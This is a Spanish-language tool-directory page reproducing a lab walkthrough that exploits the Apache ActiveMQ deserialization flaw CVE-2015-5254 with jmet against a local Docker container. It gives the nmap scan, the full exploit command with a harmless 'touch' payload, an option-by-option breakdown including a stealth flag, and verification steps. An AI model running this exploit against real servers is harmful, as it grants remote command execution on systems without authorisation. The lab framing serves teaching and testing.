Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/guigui237/exploitation-de-la-vuln-rabilit-cve-2015-5254-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubguigui237/exploitation-de-la-vuln-rabilit-cve-2015-5254-

Exploitation-de-la-vuln-rabilit-CVE-2015-5254-

Guía de explotación paso a paso para la vulnerabilidad de deserialización CVE-2015-5254 de Apache ActiveMQ usando jmet, con configuración de laboratorio basada en Docker y verificación.

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación-de-la-vulnerabilidad-CVE-2015-5254-

La vulnerabilidad CVE-2015-5254 es una falla de seguridad en Apache ActiveMQ, un servidor de mensajes de código abierto ampliamente utilizado para la comunicación entre aplicaciones. Esta vulnerabilidad afecta a las versiones de ActiveMQ hasta la 5.13.0 y reside en la falta de filtrado en los datos de entrada JMS ObjectMessage enviados.

Escaneo de red: nmap -p 61616 -Pn -T5 -n -sC -sV 172.17.0.1

image

Lanzamos ActiveMQ 2015 desde su carpeta descargada con Docker:

image

Verificamos la versión de ActiveMQ: image

Se trata de la versión 5.11.1

Explotación:

Para esta vulnerabilidad, utilizaremos el comando:

root@kitploit:~
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 172.17.0.1 61616

Este comando ejecuta un intento de explotación de la vulnerabilidad CVE-2015-5254 de Apache ActiveMQ utilizando la herramienta jmet. Aquí está el desglose de cada opción del comando:

root@kitploit:~
java -jar jmet-0.1.0-all.jar : Lanza la herramienta jmet (Java Message Exploitation Tool) usando el archivo JAR autónomo (jmet-0.1.0-all.jar).

-Q event : Especifica la "cola" o la cola de mensajes objetivo en ActiveMQ, nombrada aquí "event". La herramienta enviará el mensaje malicioso a través de esta cola.

-I ActiveMQ : Indica que el objetivo es un servidor Apache ActiveMQ.

-s : Lanza la explotación en modo "stealth" (sigiloso), lo que a veces puede minimizar los registros o alertas generados en el objetivo.

-Y "touch /tmp/success" : Indica la carga útil maliciosa que se ejecutará en el servidor objetivo en caso de éxito. En este caso, el comando touch /tmp/success crea un archivo llamado success en la carpeta /tmp para demostrar que la explotación ha funcionado.

-Yp ROME : Utiliza el payload "ROME" para intentar explotar la vulnerabilidad (ROME es aquí un tipo específico de carga útil compatible con la herramienta para ActiveMQ).

172.17.0.1 61616 : Especifica la dirección IP (1720.17.0.1) y el puerto (61616) del servidor Apache ActiveMQ objetivo.

En resumen Este comando intenta explotar una falla de deserialización en Apache ActiveMQ inyectando un mensaje malicioso en la cola "event" para ejecutar un comando remoto. Si la explotación tiene éxito, el servidor ActiveMQ objetivo ejecuta el comando touch /tmp/success, lo que es un indicador de una explotación exitosa (creación de un archivo). En resumen, se quiere infiltrar un archivo llamado success en el sistema de archivos del servidor ActiveMQ, concretamente en /tmp/.

image

Observamos que el exploit ha tenido éxito !!!

Tenemos el siguiente mensaje de detección en Apache ActiveMQ:
image

Hacemos clic en el mensaje: image

Escribimos el conjunto de los siguientes comandos:

docker ps -a Para conocer el contenedor de ActiveMQ en ejecución, vemos el contenedor 19ab278527c7 Hacemos: docker exec -it 19ab278527c7 /bin/bash Para autenticarse en el servidor ActiveMQ a través de su contenedor.

Observamos que hemos logrado la autenticación y luego hemos verificado la creación del archivo success en /tmp/ :

image

Fin del exploit !!!

Descargar herramienta